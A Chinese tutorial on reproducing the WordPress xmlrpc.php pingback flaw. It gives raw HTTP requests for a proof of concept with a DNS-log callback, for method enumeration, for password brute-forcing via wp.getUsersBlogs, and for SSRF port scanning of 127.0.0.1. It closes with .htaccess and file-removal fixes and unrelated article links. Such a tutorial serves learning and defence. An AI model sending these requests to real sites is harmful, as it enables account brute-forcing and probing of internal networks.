復(fù)現(xiàn)WordPress?xmlrpc.php漏洞和SSRF的詳細(xì)步驟
一、漏洞介紹
通過(guò)Pingback可以實(shí)現(xiàn)的服務(wù)器端請(qǐng)求偽造 (Server-side request forgery,SSRF)和遠(yuǎn)程端口掃描。
二、漏洞影響
WordPress 版本< 3.5.1
造成的影響
1、可以對(duì)業(yè)務(wù)內(nèi)網(wǎng)進(jìn)行探測(cè)。
2、攻擊運(yùn)行在內(nèi)網(wǎng)或本地的應(yīng)用程序(比如溢出攻擊)。
3、利用file協(xié)議讀取本地文件等
三、漏洞復(fù)現(xiàn)
第一步:直接訪問(wèn)這個(gè)文件,初步判斷
第二步:發(fā)現(xiàn)POC驗(yàn)證數(shù)據(jù)包
POST /xmlrpc.php HTTP/1.1 Host: www.目標(biāo).com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 310 <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://g8o53x.dnslog.cn/</string></value></param> <param><value><string>http://www.目標(biāo).com/?p=1</string></value></param> </params> </methodCall>
發(fā)送數(shù)據(jù)包
驗(yàn)證成功 !
四、深入利用
(一)查看系統(tǒng)允許的方法
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
(二)賬號(hào)爆破
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ...... <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>password</value></param> </params> </methodCall>
(三)通過(guò)Pingback可以實(shí)現(xiàn)的服務(wù)器端請(qǐng)求偽造 (Server-side request forgery,SSRF)和遠(yuǎn)程端口掃描。
POST /wordpress/xmlrpc.php HTTP/1.1 Host: www.example.com Content-Length: 99 ....... <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>要探測(cè)的ip和端口:http://127.0.0.1:80</string></value> </param><param><value><string>要探測(cè)的URL</string> </value></param></params> </methodCall>
五、漏洞修復(fù)
(一)通過(guò)APACHE的.htaccess屏蔽xmlrpc.php文件的訪問(wèn)。配置代碼如下:
# protect xmlrpc <Files "xmlrpc.php"> Order Allow,Deny Deny from all </Files>
(二)刪除根目錄下的xmlrpc.php。
到此這篇關(guān)于復(fù)現(xiàn)WordPress xmlrpc.php漏洞和SSRF的文章就介紹到這了,更多相關(guān)WordPress漏洞復(fù)現(xiàn)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
PHP 用session與gd庫(kù)實(shí)現(xiàn)簡(jiǎn)單驗(yàn)證碼生成與驗(yàn)證的類方法
下面小編就為大家?guī)?lái)一篇PHP 用session與gd庫(kù)實(shí)現(xiàn)簡(jiǎn)單驗(yàn)證碼生成與驗(yàn)證的類方法。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2016-11-11PHP 中TP5 Request 請(qǐng)求對(duì)象的實(shí)例詳解
這篇文章主要介紹了PHP 中TP5 Request 請(qǐng)求對(duì)象的實(shí)例詳解的相關(guān)資料,這里提供實(shí)現(xiàn)代碼幫助大家理解這部分內(nèi)容,需要的朋友可以參考下2017-07-07PHP和javascript常用正則表達(dá)式及用法實(shí)例
這篇文章主要介紹了常用的PHP和javascript正則表達(dá)式及用法實(shí)例,精心收集的PHP和javascript正則表達(dá)式各10個(gè),需要的朋友可以參考下2014-07-07ThinkPHP6通過(guò)Ucenter實(shí)現(xiàn)注冊(cè)登錄的示例代碼
這篇文章主要介紹了ThinkPHP6通過(guò)Ucenter實(shí)現(xiàn)注冊(cè)登錄的示例代碼,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2021-01-01php中創(chuàng)建和調(diào)用webservice接口示例
這篇文章主要介紹了php中創(chuàng)建和調(diào)用webservice接口示例,包括webservice基本知識(shí)、webservice服務(wù)端例子、webservice客戶端例子,需要的朋友可以參考下2014-07-07使用PHP連接數(shù)據(jù)庫(kù)實(shí)現(xiàn)留言板功能的實(shí)例講解(推薦)
下面小編就為大家?guī)?lái)一篇使用PHP連接數(shù)據(jù)庫(kù)實(shí)現(xiàn)留言板功能的實(shí)例講解(推薦)。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧2017-09-09Django中的cookie與session操作實(shí)例代碼
本文通過(guò)示例代碼給大家介紹了Django中的cookie與session操作,需要的朋友參考下吧2017-08-08